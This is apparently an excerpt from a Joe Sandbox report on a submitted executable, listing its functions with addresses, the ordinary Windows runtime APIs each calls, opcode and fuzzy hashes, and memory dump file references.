Opcode ID: ca7d38dff80cefe405e342e7831a47ebd979b6de56079d66fafc708ce50132e0
Instruction ID: 4e8a6c3028a2f181bc7f6278328cfe3222507bdc28b2ffb3fabc611ec45f4301
Opcode Fuzzy Hash: ca7d38dff80cefe405e342e7831a47ebd979b6de56079d66fafc708ce50132e0
Instruction Fuzzy Hash: 22E0ED71500218EBCB10EF99C541B99BBE8EB04360F10C05BA89697341E374BF04DBB1

Function 00DE2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DE2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00DE2BB5

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 12a818c1ec23c34155693a87e244f8684b7995aa1c2dd66db5466ac74cfd9c83
Instruction ID: 7a5d57de4d0fb01c87a568923677c011dba1ae06deeb8157e637487857fbf0dc
Opcode Fuzzy Hash: 12a818c1ec23c34155693a87e244f8684b7995aa1c2dd66db5466ac74cfd9c83
Instruction Fuzzy Hash: C6D022741547C0288C243E733C0B87A334EED41B787B45A9AF020DA8C9EE51D084A031

Function 00DC12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00DC1306
ShowWindow.USER32(00000000), ref: 00DC130D

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: ec4461aa69944153db8152bf2fa42f980ed1ddd977c235a01d1ff5cc7fb49e78
Instruction ID: 18e0592117f00c46e450eaca6b46052b79a5e867688e08fa8d842705c1557279
Opcode Fuzzy Hash: ec4461aa69944153db8152bf2fa42f980ed1ddd977c235a01d1ff5cc7fb49e78
Instruction Fuzzy Hash: 81C0123205C200BECB010BB5DC09C2BBBA8ABA5312F24C908B0A5D0061C23CC124DF11

Function 00DC1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC1A09

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 17cbaef744511e2ceae8e39bfc2cbf437116240135dd567da3425d2e85dea4f7
Instruction ID: 13fab2f11cf6ee338dc2720e8ac0aa184f76fb73bacc7c163bfcac56c9b9302c
Opcode Fuzzy Hash: 17cbaef744511e2ceae8e39bfc2cbf437116240135dd567da3425d2e85dea4f7
Instruction Fuzzy Hash: BDC18D38A002669BEF15CF68C494FA97BA6AF07310F1841BDEC469B397DA309D44CB71

Function 00DC3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC3BBF

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1ac161c07bb69bb3ab35cab5cafb8bd1586cbee96ba09929c667468b7677d79f
Instruction ID: e95aa2c3c5428fba9f25659a68f98a92852c283658bced3169dcf3e6625fa5e7
Opcode Fuzzy Hash: 1ac161c07bb69bb3ab35cab5cafb8bd1586cbee96ba09929c667468b7677d79f
Instruction Fuzzy Hash: 7B71C271100B869EDB25DB74C851EEBB7E9EB15301F44492EF2EB87241DA326A84DF31

Function 00DC8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC8289

Part of subcall function 00DC13DC: __EH_prolog.LIBCMT ref: 00DC13E1

Part of subcall function 00DCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DCA598

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: abd9ff6c06890ff61bf344c9cd9807e3e71d71c1843928f8ca1b2117a3b152b7
Instruction ID: df6f12d3bd3312c122fc7f89e3c7d9ded83b1d1a5b8f770a8f1b7c1f24ee7b5e
Opcode Fuzzy Hash: abd9ff6c06890ff61bf344c9cd9807e3e71d71c1843928f8ca1b2117a3b152b7
Instruction Fuzzy Hash: 5D41A57194465A9ADB24EB60CC55FEAB7A8EF00304F0444EFE18A97183EB715EC5DB70

Function 00DC13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC13E1

Part of subcall function 00DC5E37: __EH_prolog.LIBCMT ref: 00DC5E3C

Part of subcall function 00DCCE40: __EH_prolog.LIBCMT ref: 00DCCE45

Part of subcall function 00DCB505: __EH_prolog.LIBCMT ref: 00DCB50A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ddd8994ac64fce54c922126277b45e69211ef9898fbe2d7ddb3d4072a11c20ab
Instruction ID: 71729e5a728a6aeb41044a464cffb5b0c84ef08455a3bb9cb7d9f7ad6d2492a1
Opcode Fuzzy Hash: ddd8994ac64fce54c922126277b45e69211ef9898fbe2d7ddb3d4072a11c20ab
Instruction Fuzzy Hash: 5A415BB0905B419EE724DF798885AE6FBE5FF19300F544A2ED5EF83282C7316654CB20

Function 00DC13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC13E1

Part of subcall function 00DC5E37: __EH_prolog.LIBCMT ref: 00DC5E3C

Part of subcall function 00DCCE40: __EH_prolog.LIBCMT ref: 00DCCE45

Part of subcall function 00DCB505: __EH_prolog.LIBCMT ref: 00DCB50A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e57025df4134bf44443069d51fb49f7c45e9b985df81071a8c38cf41764b4151
Instruction ID: 5094290a2c2c8212513e69bf8b6ecf8cb362c5b2f08d3c5725fc14077c2b0e22
Opcode Fuzzy Hash: e57025df4134bf44443069d51fb49f7c45e9b985df81071a8c38cf41764b4151
Instruction Fuzzy Hash: 2B4148B0905B419EE724DF798885AE6FBE5FF19310F544A2ED5FE83282CB316654CB20

Function 00DDB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DDB098

Part of subcall function 00DC13DC: __EH_prolog.LIBCMT ref: 00DC13E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c0e989d85f56371ac2b030fa7c85a0a7b82acc249b1643eef6efd5bacccd85fe
Instruction ID: 463a2158b05e6a88effa061536197ddf916182cae9f605ce0a38170fa9bff99e
Opcode Fuzzy Hash: c0e989d85f56371ac2b030fa7c85a0a7b82acc249b1643eef6efd5bacccd85fe
Instruction Fuzzy Hash: 08316A7580425AEACB15EFA9C851AEEBBB4EF09314F14449FE409B7242DB35AE04CB71

Function 00DEAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00DEACF8

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: e23628e8086c46e4522e9fdba2ba291d0d8604f88e1c4e274d4691d892f1c7af
Instruction ID: 1c6e9df4f6beb141784c47ce5020357911871270919a4d0423af9a77f43c600d
Opcode Fuzzy Hash: e23628e8086c46e4522e9fdba2ba291d0d8604f88e1c4e274d4691d892f1c7af
Instruction Fuzzy Hash: 6711A737A006665F9B22BE1FDC4096A7395EB8476072A8220ED55EB364E630FC01C7F2

Function 00DC9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC921A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4ddbeeed61b38d2dcc8ca0cad0e30427784ef2deadb4bb4b274c9a44d243cbfa
Instruction ID: 7de38c36a1bcead77c5746477f9bd87f1f212244efc393550fac0bcf215e4a6a
Opcode Fuzzy Hash: 4ddbeeed61b38d2dcc8ca0cad0e30427784ef2deadb4bb4b274c9a44d243cbfa
Instruction Fuzzy Hash: B401823390056AABCF21ABA8CC95FDEF732EF88754B05412DF816B7212DA348D0086B0

Function 00DEC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00DEB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DE9813,00000001,00000364,?,00DE3F73,00000050,?,00E01030,00000200), ref: 00DEB177

_free.LIBCMT ref: 00DEC4E5

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 9c52354605942d953672930815dbe577a9944d717dee6fd928c37e881d708978
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 3701D6722103856BE3319F6A988596AFBE9EB85370F29051DE594872C1EA30B906C774

Function 00DEB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DE9813,00000001,00000364,?,00DE3F73,00000050,?,00E01030,00000200), ref: 00DEB177

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 11db71216550bceb63c843edaec0f721dac66ce5f6e11e9bf25bc8e0c3e05b94
Instruction ID: efba70cb4ba241e9b6f5cd82d95d801e25d0525afd4ccba0c3c166563e220c73
Opcode Fuzzy Hash: 11db71216550bceb63c843edaec0f721dac66ce5f6e11e9bf25bc8e0c3e05b94
Instruction Fuzzy Hash: E9F054325057A57BDB217B27AD25B9F7748EB41770B1D8127BC08A6194CB60F90186F0

Function 00DE3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00DE3C3F

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 4f0582f7d79fbfea1bd7f1eda3b277637074f88f52f522bb88b27290e8d87b44
Instruction ID: be222be96acbb95819927bfff62f4b78bdafdae83bcc6d5a0c2ebb8cda165a47
Opcode Fuzzy Hash: 4f0582f7d79fbfea1bd7f1eda3b277637074f88f52f522bb88b27290e8d87b44
Instruction Fuzzy Hash: B8F0EC32200356AFCF116E6AEC089BA7799EF05B217244125FA05E7190DB31DA20C7B0

Function 00DE8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00DECA2C,00000000,?,00DE6CBE,?,00000008,?,00DE91E0,?,?,?), ref: 00DE8E38

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c84f2910807d57729da9e52007032c306e9177ff7a8f50d660b3c0b164aeed21
Instruction ID: ccf66e8a5f79fea3358a67dab56664a85716d0badc4d38161467b6dfb641772e
Opcode Fuzzy Hash: c84f2910807d57729da9e52007032c306e9177ff7a8f50d660b3c0b164aeed21
Instruction Fuzzy Hash: 03E06D312063E566EA7237679D05B9BB649DB42BA4F190121BC5CA7191CF62CC01A2F1

Function 00DC5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC5AC2

Part of subcall function 00DCB505: __EH_prolog.LIBCMT ref: 00DCB50A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f0d0e379804eaba242d0532e7fb65f1d786e5aee708d054a58c009d9ca9e2692
Instruction ID: 9907c2d9acd12ee94c6ab5b1629f34dd249b4b3886fbcfc04c1ddcd71b544213
Opcode Fuzzy Hash: f0d0e379804eaba242d0532e7fb65f1d786e5aee708d054a58c009d9ca9e2692
Instruction Fuzzy Hash: 7E018C30810794DAD725E7B8C0417EDFBA8DFA4304F58848EA45A53382CBB46B08D7B2

Function 00DCA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00DCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA6C4
Part of subcall function 00DCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA6F2
Part of subcall function 00DCA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DCA598

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 4ec1bae8332153cc41f8ca45d3bf56c804560e97a9114874c1f7cf8bdef77479
Instruction ID: 803ed216c7a978c93970d4d6e713b3d594916e2d8d1601f61d5a12a3db266302
Opcode Fuzzy Hash: 4ec1bae8332153cc41f8ca45d3bf56c804560e97a9114874c1f7cf8bdef77479
Instruction Fuzzy Hash: 16F0E931008795AACF2257B84801FCBBB909F19339F05CA0DF0FD53196C27150948B33

Function 00DD0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00DD0E3D

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 1f825dfeff43dd436f0a280e5003b120653d29a36b53d0b91e67e7f1090257b3
Instruction ID: ed1b60f756d20eb0e1c2c7fa3b5efe83d7c23a7854121ccabf120f19a1612ad2
Opcode Fuzzy Hash: 1f825dfeff43dd436f0a280e5003b120653d29a36b53d0b91e67e7f1090257b3
Instruction Fuzzy Hash: 75D012156011956AEA1137296955BFE2E0ACFD7711F0E006BB1856B3C2CE554886A271

Function 00DDA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00DDA62C

Part of subcall function 00DDA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DDA3DA

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
